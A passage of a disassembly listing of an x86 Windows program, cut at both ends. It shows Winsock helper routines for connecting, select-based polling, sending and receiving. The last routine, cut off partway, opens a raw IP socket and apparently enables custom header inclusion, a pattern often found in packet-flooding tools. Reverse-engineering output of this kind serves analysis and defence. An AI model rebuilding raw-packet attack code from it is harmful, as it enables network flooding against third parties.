mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+4]
call sub_4053B1
pop ecx
jmp short loc_404CC5
; ---------------------------------------------------------------------------
loc_404CFB: ; CODE XREF: sub_404CBB+19�j
; sub_404CBB+2C�j
mov eax, [ebp+arg_0]
and dword ptr [eax+804h], 0
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
leave
retn
sub_404CBB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404D10 proc near ; CODE XREF: sub_41349C+1B7�p
; sub_4143B0+3A�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 200h
jbe short loc_404D21
xor eax, eax
jmp short locret_404D4B
; ---------------------------------------------------------------------------
loc_404D21: ; CODE XREF: sub_404D10+B�j
push 1010h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_404D39
xor eax, eax
jmp short locret_404D4B
; ---------------------------------------------------------------------------
loc_404D39: ; CODE XREF: sub_404D10+23�j
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov [eax], ecx
mov eax, [ebp+var_4]
and dword ptr [eax+4], 0
mov eax, [ebp+var_4]
locret_404D4B: ; CODE XREF: sub_404D10+F�j
; sub_404D10+27�j
leave
retn
sub_404D10 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404D4D proc near ; CODE XREF: sub_41349C+417�p
; sub_4143B0+109�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_4]
mov eax, [eax+4]
cmp eax, [ecx]
jnz short loc_404D6A
push [ebp+arg_0]
call sub_4053B1
pop ecx
xor eax, eax
jmp short loc_404D99
; ---------------------------------------------------------------------------
loc_404D6A: ; CODE XREF: sub_404D4D+E�j
mov eax, [ebp+arg_4]
mov eax, [eax+4]
mov ecx, [ebp+arg_4]
mov edx, [ebp+arg_0]
mov [ecx+eax*4+0Ch], edx
mov eax, [ebp+arg_4]
mov eax, [eax+4]
inc eax
mov ecx, [ebp+arg_4]
mov [ecx+4], eax
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_4]
mov eax, [eax+4]
xor edx, edx
cmp eax, [ecx]
setnz dl
mov eax, edx
loc_404D99: ; CODE XREF: sub_404D4D+1B�j
pop ebp
retn
sub_404D4D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404D9B proc near ; CODE XREF: sub_41349C+512�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_404DAC
; ---------------------------------------------------------------------------
loc_404DA5: ; CODE XREF: sub_404D9B:loc_404E18�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_404DAC: ; CODE XREF: sub_404D9B+8�j
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
cmp ecx, [eax+4]
jnb short locret_404E1A
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov eax, [ecx+eax*4+0Ch]
cmp eax, [ebp+arg_0]
jnz short loc_404E18
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
cmp ecx, [eax+8]
jb short loc_404DDE
mov eax, [ebp+arg_4]
mov eax, [eax+8]
dec eax
mov ecx, [ebp+arg_4]
mov [ecx+8], eax
loc_404DDE: ; CODE XREF: sub_404D9B+34�j
mov eax, [ebp+arg_4]
mov eax, [eax+4]
sub eax, [ebp+var_4]
shl eax, 2
push eax
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
lea eax, [ecx+eax*4+10h]
push eax
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
lea eax, [ecx+eax*4+0Ch]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+arg_4]
mov eax, [eax+4]
dec eax
mov ecx, [ebp+arg_4]
mov [ecx+4], eax
jmp short locret_404E1A
; ---------------------------------------------------------------------------
loc_404E18: ; CODE XREF: sub_404D9B+29�j
jmp short loc_404DA5
; ---------------------------------------------------------------------------
locret_404E1A: ; CODE XREF: sub_404D9B+1A�j
; sub_404D9B+7B�j
leave
retn
sub_404D9B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404E1C proc near ; CODE XREF: sub_41349C+45F�p
; sub_4143B0+14E�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push esi
mov eax, [ebp+arg_0]
and dword ptr [eax+8], 0
mov eax, [ebp+arg_0]
and dword ptr [eax+80Ch], 0
and [ebp+var_8], 0
jmp short loc_404E41
; ---------------------------------------------------------------------------
loc_404E3A: ; CODE XREF: sub_404E1C+BD�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_404E41: ; CODE XREF: sub_404E1C+1C�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
cmp ecx, [eax+4]
jnb loc_404EDE
loc_404E50: ; CODE XREF: sub_404E1C+B7�j
and [ebp+var_14], 0
jmp short loc_404E5D
; ---------------------------------------------------------------------------
loc_404E56: ; CODE XREF: sub_404E1C:loc_404E86�j
mov eax, [ebp+var_14]
inc eax
mov [ebp+var_14], eax
loc_404E5D: ; CODE XREF: sub_404E1C+38�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_14]
cmp ecx, [eax+80Ch]
jnb short loc_404E88
mov eax, [ebp+var_14]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
mov esi, [ebp+arg_0]
mov eax, [ecx+eax*4+810h]
cmp eax, [esi+edx*4+0Ch]
jnz short loc_404E86
jmp short loc_404E88
; ---------------------------------------------------------------------------
loc_404E86: ; CODE XREF: sub_404E1C+66�j
jmp short loc_404E56
; ---------------------------------------------------------------------------
loc_404E88: ; CODE XREF: sub_404E1C+4D�j
; sub_404E1C+68�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_14]
cmp ecx, [eax+80Ch]
jnz short loc_404ECF
mov eax, [ebp+arg_0]
cmp dword ptr [eax+80Ch], 200h
jnb short loc_404ECF
mov eax, [ebp+var_14]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
mov esi, [ebp+arg_0]
mov edx, [esi+edx*4+0Ch]
mov [ecx+eax*4+810h], edx
mov eax, [ebp+arg_0]
mov eax, [eax+80Ch]
inc eax
mov ecx, [ebp+arg_0]
mov [ecx+80Ch], eax
loc_404ECF: ; CODE XREF: sub_404E1C+78�j
; sub_404E1C+87�j
xor eax, eax
test eax, eax
jnz loc_404E50
jmp loc_404E3A
; ---------------------------------------------------------------------------
loc_404EDE: ; CODE XREF: sub_404E1C+2E�j
and [ebp+var_10], 0
mov [ebp+var_C], 3E8h
lea eax, [ebp+var_10]
push eax
push 0
mov eax, [ebp+arg_0]
add eax, 80Ch
push eax
push 0
push 0
call dword_41722C ; select
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_404F1A
cmp [ebp+var_4], 0FFFFFFFFh
jz short loc_404F1A
mov [ebp+var_18], 1
jmp short loc_404F1E
; ---------------------------------------------------------------------------
loc_404F1A: ; CODE XREF: sub_404E1C+ED�j
; sub_404E1C+F3�j
and [ebp+var_18], 0
loc_404F1E: ; CODE XREF: sub_404E1C+FC�j
mov eax, [ebp+var_18]
pop esi
leave
retn
sub_404E1C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404F24 proc near ; CODE XREF: sub_41349C+470�p
; sub_4143B0+16D�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
mov eax, [eax+8]
mov [ebp+var_4], eax
jmp short loc_404F3A
; ---------------------------------------------------------------------------
loc_404F33: ; CODE XREF: sub_404F24:loc_404F77�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_404F3A: ; CODE XREF: sub_404F24+D�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_4]
cmp ecx, [eax+4]
jnb short loc_404F79
mov eax, [ebp+arg_0]
add eax, 80Ch
push eax
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+0Ch]
call sub_416E30 ; __WSAFDIsSet
test eax, eax
jz short loc_404F77
mov eax, [ebp+var_4]
inc eax
mov ecx, [ebp+arg_0]
mov [ecx+8], eax
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov eax, [ecx+eax*4+0Ch]
jmp short locret_404F7B
; ---------------------------------------------------------------------------
loc_404F77: ; CODE XREF: sub_404F24+3B�j
jmp short loc_404F33
; ---------------------------------------------------------------------------
loc_404F79: ; CODE XREF: sub_404F24+1F�j
xor eax, eax
locret_404F7B: ; CODE XREF: sub_404F24+51�j
leave
retn
sub_404F24 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404F7D proc near ; CODE XREF: sub_404FD0+6�p
; sub_41349C+59C�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_404F8E
; ---------------------------------------------------------------------------
loc_404F87: ; CODE XREF: sub_404F7D+37�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_404F8E: ; CODE XREF: sub_404F7D+8�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_4]
cmp ecx, [eax+4]
jnb short loc_404FB6
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+0Ch]
call sub_4053B1
pop ecx
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
and dword ptr [ecx+eax*4+0Ch], 0
jmp short loc_404F87
; ---------------------------------------------------------------------------
loc_404FB6: ; CODE XREF: sub_404F7D+1A�j
mov eax, [ebp+arg_0]
and dword ptr [eax+4], 0
mov eax, [ebp+arg_0]
and dword ptr [eax+8], 0
mov eax, [ebp+arg_0]
and dword ptr [eax+80Ch], 0
leave
retn
sub_404F7D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404FD0 proc near ; CODE XREF: sub_41349C+5FB�p
; sub_4143B0+238�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call sub_404F7D
pop ecx
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
pop ebp
retn
sub_404FD0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404FE7 proc near ; CODE XREF: sub_412BC9+11�p
; sub_41349C+40E�p ...
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 2Ch
push 20h
push 0
lea eax, [ebp+var_24]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+arg_8]
and eax, 2
test eax, eax
jz short loc_405010
mov [ebp+var_20], 17h
jmp short loc_405027
; ---------------------------------------------------------------------------
loc_405010: ; CODE XREF: sub_404FE7+1E�j
mov eax, [ebp+arg_8]
and eax, 1
test eax, eax
jz short loc_405023
mov [ebp+var_20], 2
jmp short loc_405027
; ---------------------------------------------------------------------------
loc_405023: ; CODE XREF: sub_404FE7+31�j
and [ebp+var_20], 0
loc_405027: ; CODE XREF: sub_404FE7+27�j
; sub_404FE7+3A�j
mov eax, [ebp+arg_8]
and eax, 4
xor ecx, ecx
test eax, eax
setnz cl
inc ecx
mov [ebp+var_1C], ecx
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_24]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call dword_41DF14 ; getaddrinfo
test eax, eax
jz short loc_405057
xor eax, eax
jmp locret_4050E8
; ---------------------------------------------------------------------------
loc_405057: ; CODE XREF: sub_404FE7+67�j
mov eax, [ebp+var_28]
mov [ebp+var_4], eax
jmp short loc_405068
; ---------------------------------------------------------------------------
loc_40505F: ; CODE XREF: sub_404FE7+A8�j
; sub_404FE7+F4�j
mov eax, [ebp+var_4]
mov eax, [eax+1Ch]
mov [ebp+var_4], eax
loc_405068: ; CODE XREF: sub_404FE7+76�j
cmp [ebp+var_4], 0
jz short loc_4050DD
mov eax, [ebp+var_4]
push dword ptr [eax+0Ch]
mov eax, [ebp+var_4]
push dword ptr [eax+8]
mov eax, [ebp+var_4]
push dword ptr [eax+4]
call dword_417218 ; socket
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0FFFFFFFFh
jnz short loc_405091
jmp short loc_40505F
; ---------------------------------------------------------------------------
loc_405091: ; CODE XREF: sub_404FE7+A6�j
push 0
push [ebp+var_2C]
call sub_404457
pop ecx
pop ecx
mov eax, [ebp+var_4]
push dword ptr [eax+10h]
mov eax, [ebp+var_4]
push dword ptr [eax+18h]
push [ebp+var_2C]
call dword_4171F4 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_4050D2
call dword_417224 ; WSAGetLastError
cmp eax, 2733h
jnz short loc_4050D2
push [ebp+var_28]
call dword_41DF1C ; freeaddrinfo
mov eax, [ebp+var_2C]
jmp short locret_4050E8
; ---------------------------------------------------------------------------
loc_4050D2: ; CODE XREF: sub_404FE7+CE�j
; sub_404FE7+DB�j
push [ebp+var_2C]
call sub_4053B1
pop ecx
jmp short loc_40505F
; ---------------------------------------------------------------------------
loc_4050DD: ; CODE XREF: sub_404FE7+85�j
push [ebp+var_28]
call dword_41DF1C ; freeaddrinfo
xor eax, eax
locret_4050E8: ; CODE XREF: sub_404FE7+6B�j
; sub_404FE7+E9�j
leave
retn
sub_404FE7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4050EA proc near ; CODE XREF: sub_401E38+80�p
; sub_402698+16�p ...
var_844 = dword ptr -844h
var_840 = dword ptr -840h
var_83C = dword ptr -83Ch
var_838 = dword ptr -838h
var_834 = dword ptr -834h
var_830 = dword ptr -830h
var_82C = dword ptr -82Ch
var_828 = dword ptr -828h
var_824 = dword ptr -824h
var_820 = dword ptr -820h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 844h
mov eax, [ebp+arg_C]
cdq
mov ecx, 3E8h
idiv ecx
mov [ebp+var_834], eax
mov eax, [ebp+arg_C]
cdq
mov ecx, 3E8h
idiv ecx
imul edx, 3E8h
mov [ebp+var_830], edx
push 20h
push 0
lea eax, [ebp+var_24]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+arg_8]
and eax, 2
test eax, eax
jz short loc_40513E
mov [ebp+var_20], 17h
jmp short loc_405155
; ---------------------------------------------------------------------------
loc_40513E: ; CODE XREF: sub_4050EA+49�j
mov eax, [ebp+arg_8]
and eax, 1
test eax, eax
jz short loc_405151
mov [ebp+var_20], 2
jmp short loc_405155
; ---------------------------------------------------------------------------
loc_405151: ; CODE XREF: sub_4050EA+5C�j
and [ebp+var_20], 0
loc_405155: ; CODE XREF: sub_4050EA+52�j
; sub_4050EA+65�j
mov eax, [ebp+arg_8]
and eax, 4
xor ecx, ecx
test eax, eax
setnz cl
inc ecx
mov [ebp+var_1C], ecx
lea eax, [ebp+var_82C]
push eax
lea eax, [ebp+var_24]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call dword_41DF14 ; getaddrinfo
test eax, eax
jz short loc_405188
xor eax, eax
jmp locret_40538B
; ---------------------------------------------------------------------------
loc_405188: ; CODE XREF: sub_4050EA+95�j
mov eax, [ebp+var_82C]
mov [ebp+var_4], eax
jmp short loc_40519C
; ---------------------------------------------------------------------------
loc_405193: ; CODE XREF: sub_4050EA+E3�j
; sub_4050EA+128�j ...
mov eax, [ebp+var_4]
mov eax, [eax+1Ch]
mov [ebp+var_4], eax
loc_40519C: ; CODE XREF: sub_4050EA+A7�j
cmp [ebp+var_4], 0
jz loc_40537D
mov eax, [ebp+var_4]
push dword ptr [eax+0Ch]
mov eax, [ebp+var_4]
push dword ptr [eax+8]
mov eax, [ebp+var_4]
push dword ptr [eax+4]
call dword_417218 ; socket
mov [ebp+var_83C], eax
cmp [ebp+var_83C], 0FFFFFFFFh
jnz short loc_4051CF
jmp short loc_405193
; ---------------------------------------------------------------------------
loc_4051CF: ; CODE XREF: sub_4050EA+E1�j
push 0
push [ebp+var_83C]
call sub_404457
pop ecx
pop ecx
mov eax, [ebp+var_4]
push dword ptr [eax+10h]
mov eax, [ebp+var_4]
push dword ptr [eax+18h]
push [ebp+var_83C]
call dword_4171F4 ; connect
mov [ebp+var_838], eax
cmp [ebp+var_838], 0
jz short loc_405217
call dword_417224 ; WSAGetLastError
cmp eax, 2733h
jz short loc_405217
jmp loc_405193
; ---------------------------------------------------------------------------
loc_405217: ; CODE XREF: sub_4050EA+119�j
; sub_4050EA+126�j
and [ebp+var_828], 0
loc_40521E: ; CODE XREF: sub_4050EA+1AF�j
and [ebp+var_840], 0
jmp short loc_405234
; ---------------------------------------------------------------------------
loc_405227: ; CODE XREF: sub_4050EA:loc_405259�j
mov eax, [ebp+var_840]
inc eax
mov [ebp+var_840], eax
loc_405234: ; CODE XREF: sub_4050EA+13B�j
mov eax, [ebp+var_840]
cmp eax, [ebp+var_828]
jnb short loc_40525B
mov eax, [ebp+var_840]
mov eax, [ebp+eax*4+var_824]
cmp eax, [ebp+var_83C]
jnz short loc_405259
jmp short loc_40525B
; ---------------------------------------------------------------------------
loc_405259: ; CODE XREF: sub_4050EA+16B�j
jmp short loc_405227
; ---------------------------------------------------------------------------
loc_40525B: ; CODE XREF: sub_4050EA+156�j
; sub_4050EA+16D�j
mov eax, [ebp+var_840]
cmp eax, [ebp+var_828]
jnz short loc_405295
cmp [ebp+var_828], 200h
jnb short loc_405295
mov eax, [ebp+var_840]
mov ecx, [ebp+var_83C]
mov [ebp+eax*4+var_824], ecx
mov eax, [ebp+var_828]
inc eax
mov [ebp+var_828], eax
loc_405295: ; CODE XREF: sub_4050EA+17D�j
; sub_4050EA+189�j
xor eax, eax
test eax, eax
jnz short loc_40521E
lea eax, [ebp+var_834]
push eax
push 0
lea eax, [ebp+var_828]
push eax
push 0
push 0
call dword_41722C ; select
cmp eax, 1
jnz short loc_4052E0
push 1
push [ebp+var_83C]
call sub_404457
pop ecx
pop ecx
push [ebp+var_82C]
call dword_41DF1C ; freeaddrinfo
mov eax, [ebp+var_83C]
jmp locret_40538B
; ---------------------------------------------------------------------------
loc_4052E0: ; CODE XREF: sub_4050EA+1CE�j
; sub_4050EA+27C�j
and [ebp+var_844], 0
jmp short loc_4052F6
; ---------------------------------------------------------------------------
loc_4052E9: ; CODE XREF: sub_4050EA:loc_405360�j
mov eax, [ebp+var_844]
inc eax
mov [ebp+var_844], eax
loc_4052F6: ; CODE XREF: sub_4050EA+1FD�j
mov eax, [ebp+var_844]
cmp eax, [ebp+var_828]
jnb short loc_405362
mov eax, [ebp+var_844]
mov eax, [ebp+eax*4+var_824]
cmp eax, [ebp+var_83C]
jnz short loc_405360
loc_405319: ; CODE XREF: sub_4050EA+265�j
mov eax, [ebp+var_828]
dec eax
cmp [ebp+var_844], eax
jnb short loc_405351
mov eax, [ebp+var_844]
mov ecx, [ebp+var_844]
mov ecx, [ebp+ecx*4+var_820]
mov [ebp+eax*4+var_824], ecx
mov eax, [ebp+var_844]
inc eax
mov [ebp+var_844], eax
jmp short loc_405319
; ---------------------------------------------------------------------------
loc_405351: ; CODE XREF: sub_4050EA+23C�j
mov eax, [ebp+var_828]
dec eax
mov [ebp+var_828], eax
jmp short loc_405362
; ---------------------------------------------------------------------------
loc_405360: ; CODE XREF: sub_4050EA+22D�j
jmp short loc_4052E9
; ---------------------------------------------------------------------------
loc_405362: ; CODE XREF: sub_4050EA+218�j
; sub_4050EA+274�j
xor eax, eax
test eax, eax
jnz loc_4052E0
push [ebp+var_83C]
call sub_4053B1
pop ecx
jmp loc_405193
; ---------------------------------------------------------------------------
loc_40537D: ; CODE XREF: sub_4050EA+B6�j
push [ebp+var_82C]
call dword_41DF1C ; freeaddrinfo
xor eax, eax
locret_40538B: ; CODE XREF: sub_4050EA+99�j
; sub_4050EA+1F1�j
leave
retn
sub_4050EA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40538D proc near ; CODE XREF: sub_401E38+26E�p
; sub_4020C2+3FB�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 1
push [ebp+arg_0]
call dword_417200 ; shutdown
push 3E8h
call dword_41709C ; Sleep
push [ebp+arg_0]
call sub_4053B1
pop ecx
pop ebp
retn
sub_40538D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4053B1 proc near ; CODE XREF: sub_404279+77�p
; sub_40432E+1C�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call dword_417230 ; closesocket
pop ebp
retn
sub_4053B1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4053BF proc near ; CODE XREF: sub_401E38+15C�p
; sub_4020C2+2F9�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push 0
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_41720C ; send
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
leave
retn
sub_4053BF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4053DC proc near ; CODE XREF: sub_403DF3+D1�p
; sub_405443+21�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_8], 2
jnb short loc_4053F6
push 271Eh
call dword_417234 ; WSASetLastError
or eax, 0FFFFFFFFh
jmp short locret_405441
; ---------------------------------------------------------------------------
loc_4053F6: ; CODE XREF: sub_4053DC+8�j
push 0
mov eax, [ebp+arg_8]
dec eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call dword_417248 ; recv
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_405418
cmp [ebp+var_4], 0FFFFFFFFh
jnz short loc_40541D
loc_405418: ; CODE XREF: sub_4053DC+34�j
mov eax, [ebp+var_4]
jmp short locret_405441
; ---------------------------------------------------------------------------
loc_40541D: ; CODE XREF: sub_4053DC+3A�j
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_8]
jb short loc_405435
push 271Eh
call dword_417234 ; WSASetLastError
or eax, 0FFFFFFFFh
jmp short locret_405441
; ---------------------------------------------------------------------------
loc_405435: ; CODE XREF: sub_4053DC+47�j
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
and byte ptr [eax], 0
mov eax, [ebp+var_4]
locret_405441: ; CODE XREF: sub_4053DC+18�j
; sub_4053DC+3F�j ...
leave
retn
sub_4053DC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405443 proc near ; CODE XREF: sub_402698+8D�p
; sub_402698+2BE�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push [ebp+arg_C]
push [ebp+arg_0]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_40545B
xor eax, eax
jmp short loc_40546C
; ---------------------------------------------------------------------------
loc_40545B: ; CODE XREF: sub_405443+12�j
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4053DC
add esp, 0Ch
loc_40546C: ; CODE XREF: sub_405443+16�j
pop ebp
retn
sub_405443 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40546E proc near ; CODE XREF: sub_405443+9�p
; sub_410649+2D�p ...
var_1018 = dword ptr -1018h
var_1014 = dword ptr -1014h
var_1010 = dword ptr -1010h
var_100C = dword ptr -100Ch
var_1008 = dword ptr -1008h
var_1004 = dword ptr -1004h
var_804 = dword ptr -804h
var_800 = dword ptr -800h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1018h
call sub_416BC0
and [ebp+var_804], 0
and [ebp+var_1008], 0
loc_405489: ; CODE XREF: sub_40546E+90�j
and [ebp+var_1014], 0
jmp short loc_40549F
; ---------------------------------------------------------------------------
loc_405492: ; CODE XREF: sub_40546E:loc_4054C1�j
mov eax, [ebp+var_1014]
inc eax
mov [ebp+var_1014], eax
loc_40549F: ; CODE XREF: sub_40546E+22�j
mov eax, [ebp+var_1014]
cmp eax, [ebp+var_804]
jnb short loc_4054C3
mov eax, [ebp+var_1014]
mov eax, [ebp+eax*4+var_800]
cmp eax, [ebp+arg_0]
jnz short loc_4054C1
jmp short loc_4054C3
; ---------------------------------------------------------------------------
loc_4054C1: ; CODE XREF: sub_40546E+4F�j
jmp short loc_405492
; ---------------------------------------------------------------------------
loc_4054C3: ; CODE XREF: sub_40546E+3D�j
; sub_40546E+51�j
mov eax, [ebp+var_1014]
cmp eax, [ebp+var_804]
jnz short loc_4054FA
cmp [ebp+var_804], 200h
jnb short loc_4054FA
mov eax, [ebp+var_1014]
mov ecx, [ebp+arg_0]
mov [ebp+eax*4+var_800], ecx
mov eax, [ebp+var_804]
inc eax
mov [ebp+var_804], eax
loc_4054FA: ; CODE XREF: sub_40546E+61�j
; sub_40546E+6D�j
xor eax, eax
test eax, eax
jnz short loc_405489
loc_405500: ; CODE XREF: sub_40546E+107�j
and [ebp+var_1018], 0
jmp short loc_405516
; ---------------------------------------------------------------------------
loc_405509: ; CODE XREF: sub_40546E:loc_405538�j
mov eax, [ebp+var_1018]
inc eax
mov [ebp+var_1018], eax
loc_405516: ; CODE XREF: sub_40546E+99�j
mov eax, [ebp+var_1018]
cmp eax, [ebp+var_1008]
jnb short loc_40553A
mov eax, [ebp+var_1018]
mov eax, [ebp+eax*4+var_1004]
cmp eax, [ebp+arg_0]
jnz short loc_405538
jmp short loc_40553A
; ---------------------------------------------------------------------------
loc_405538: ; CODE XREF: sub_40546E+C6�j
jmp short loc_405509
; ---------------------------------------------------------------------------
loc_40553A: ; CODE XREF: sub_40546E+B4�j
; sub_40546E+C8�j
mov eax, [ebp+var_1018]
cmp eax, [ebp+var_1008]
jnz short loc_405571
cmp [ebp+var_1008], 200h
jnb short loc_405571
mov eax, [ebp+var_1018]
mov ecx, [ebp+arg_0]
mov [ebp+eax*4+var_1004], ecx
mov eax, [ebp+var_1008]
inc eax
mov [ebp+var_1008], eax
loc_405571: ; CODE XREF: sub_40546E+D8�j
; sub_40546E+E4�j
xor eax, eax
test eax, eax
jnz short loc_405500
mov eax, [ebp+arg_4]
xor edx, edx
mov ecx, 3E8h
div ecx
mov [ebp+var_1010], eax
mov eax, [ebp+arg_4]
xor edx, edx
mov ecx, 3E8h
div ecx
imul edx, 3E8h
mov [ebp+var_100C], edx
lea eax, [ebp+var_1010]
push eax
lea eax, [ebp+var_1008]
push eax
push 0
lea eax, [ebp+var_804]
push eax
push 1
call dword_41722C ; select
cmp eax, 1
jz short loc_4055C9
xor eax, eax
jmp short locret_4055E3
; ---------------------------------------------------------------------------
loc_4055C9: ; CODE XREF: sub_40546E+155�j
lea eax, [ebp+var_804]
push eax
push [ebp+arg_0]
call sub_416E30 ; __WSAFDIsSet
test eax, eax
jz short loc_4055E1
push 1
pop eax
jmp short locret_4055E3
; ---------------------------------------------------------------------------
loc_4055E1: ; CODE XREF: sub_40546E+16C�j
xor eax, eax
locret_4055E3: ; CODE XREF: sub_40546E+159�j
; sub_40546E+171�j
leave
retn
sub_40546E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4055E5 proc near ; DATA XREF: sub_405E45+113�o
var_1358 = dword ptr -1358h
var_1354 = dword ptr -1354h
var_1350 = dword ptr -1350h
var_134C = dword ptr -134Ch
var_1348 = dword ptr -1348h
var_1344 = dword ptr -1344h
var_1340 = dword ptr -1340h
var_133C = dword ptr -133Ch
var_1338 = dword ptr -1338h
var_1334 = dword ptr -1334h
var_118D = byte ptr -118Dh
var_108D = byte ptr -108Dh
var_1087 = dword ptr -1087h
var_1083 = dword ptr -1083h
var_107F = dword ptr -107Fh
var_1078 = dword ptr -1078h
var_1074 = byte ptr -1074h
var_1058 = byte ptr -1058h
var_14 = dword ptr -14h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1358h
call sub_416BC0
push 2B9h
push [ebp+arg_0]
lea eax, [ebp+var_1334]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push 0FFh
push 3
push 2
call dword_417218 ; socket
mov [ebp+var_1078], eax
cmp [ebp+var_1078], 0FFFFFFFFh
jnz short loc_405643
push [ebp+var_1334]
call sub_409763
pop ecx
xor eax, eax
jmp locret_405E41
; ---------------------------------------------------------------------------
loc_405643: ; CODE XREF: sub_4055E5+49�j
mov [ebp+var_1340], 1
push 4
lea eax, [ebp+var_1340]
push eax
push 2
push 0
push [ebp+var_1078]
call dword_417204 ; setsockopt
cmp eax, 0FFFFFFFFh
